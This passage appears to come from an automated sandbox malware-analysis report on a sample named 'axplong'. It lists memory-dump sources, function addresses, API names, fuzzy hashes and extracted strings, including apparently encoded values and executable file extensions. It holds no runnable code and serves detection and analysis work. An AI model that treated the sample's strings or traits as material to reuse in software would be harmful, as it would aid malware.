                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8f18ef6ec813dbe5f92cbb7a0488b742292b68170161e977ec498d2013b9aa98
                      • Instruction ID: a55157dfe8b223004a42e3195bea58aee899a804f21a23e48ac851656a38ec5f
                      • Opcode Fuzzy Hash: 8f18ef6ec813dbe5f92cbb7a0488b742292b68170161e977ec498d2013b9aa98
                      • Instruction Fuzzy Hash: 03117723F30C255A675C817D8C172BAA6D6DBD825071F533AD826EB384E994DE23D290
                      Function 00AB8720 Relevance: .1, Instructions: 76COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: 3d798332d00412e4f2586ac7d505df7e22e169d2b07526189d3d079189d8d708
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: F011087B20114247D604872DC9F49F6A79EEAC5329B3C437AD0414B75BDE3BD9C5D900
                      Function 00AA645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ae9a08bd8344cf53e86c0f75ae56990a3a27e1aaa18873f047a42f9405c3b805
                      • Instruction ID: c13c146c10de935512d9eb78e5c5914ab8d8eb14a20647452e3c07381cef6e49
                      • Opcode Fuzzy Hash: ae9a08bd8344cf53e86c0f75ae56990a3a27e1aaa18873f047a42f9405c3b805
                      • Instruction Fuzzy Hash: A0E08C31191A086FCF267F14CA18A5D3B6EEB57348F188810F8144B261CB2AEC82CE80
                      Function 00AAA1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction ID: bebf7f71a6327cff48772cbda625a98eb2eae92116f83ae07cc5ef50435f4542
                      • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction Fuzzy Hash: 41E0B672925228FBCB25DBD88A44D9AF2ECEB4AB50F554596B501D3291C370DF00C7D1
                      Function 00A82E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
                      • API String ID: 0-2390467879
                      • Opcode ID: 00f09f157acb21c240d65a6ced475cf1da23301fb865fb82383aa373c97c4c31
                      • Instruction ID: 861ead3fb1773b6362d66c7230cd6bd4e6a862631c22bf1e4c679508366d5bac
                      • Opcode Fuzzy Hash: 00f09f157acb21c240d65a6ced475cf1da23301fb865fb82383aa373c97c4c31
                      • Instruction Fuzzy Hash: 0902D171A00248EFEF14EFA8C949BDEBBB5FF05304F604558E815A7282D7759A84CFA1
                      Function 00AA70C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: _wcsrchr
                      • String ID: .bat$.cmd$.com$.exe
                      • API String ID: 1752292252-4019086052
                      • Opcode ID: f190141fab10e215728b85e991191a8999fbcb0024b7856a6f5472c392137bea
                      • Instruction ID: 15b8034fc00991ce00897939bd24c05a5799eca99d983457034cb0ee3a3c27fd
                      • Opcode Fuzzy Hash: f190141fab10e215728b85e991191a8999fbcb0024b7856a6f5472c392137bea
                      • Instruction Fuzzy Hash: 6301D63761871626662865199D02B7F1BDCAB83BB472A012FF944FB3C3EF45DC0282A0
                      Function 00A72E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_unlock$Cnd_broadcast
                      • String ID:
                      • API String ID: 32384418-0
                      • Opcode ID: 443c1d47020f61ace54bdfd94f96f7a19d7ab32ace992780c2d7a26a2e30894c
                      • Instruction ID: 4ae3085dc1efed3d6f7a2ef5fae90f3940bb6090ff4701d77a4930bc8c37e8e1
                      • Opcode Fuzzy Hash: 443c1d47020f61ace54bdfd94f96f7a19d7ab32ace992780c2d7a26a2e30894c
                      • Instruction Fuzzy Hash: 5AA1B0B1A01205AFDF11EB64CD44BAAB7B8FF15324F44C639E819D7241EB35EA14CBA1
                      Function 00AAC9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction ID: a1ca0ab840beaf949341eac9f0c7e4e53b3bc324f0acffb39d8ae7e8ef48064f
                      • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction Fuzzy Hash: 17B127329042859FEB11CF28C8417BEBBF5EF56360F1481AAE455EB382D7399D41CB60
                      Function 00A8BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Xtime_diff_to_millis2_xtime_get
                      • String ID:
                      • API String ID: 531285432-0
                      • Opcode ID: 368d28a39cad6a5d47d68fa228ee111492e8b5162450a31c49439047131c8461
                      • Instruction ID: 5d860cff547baab91becded3cdc0bb8aa73ba445b12da3f169f052e7afa90289
                      • Opcode Fuzzy Hash: 368d28a39cad6a5d47d68fa228ee111492e8b5162450a31c49439047131c8461
                      • Instruction Fuzzy Hash: E7212F71A012199FDF14FFA4DD45DAEBBB8EF48724F100065F601A7251DB34AD018FA1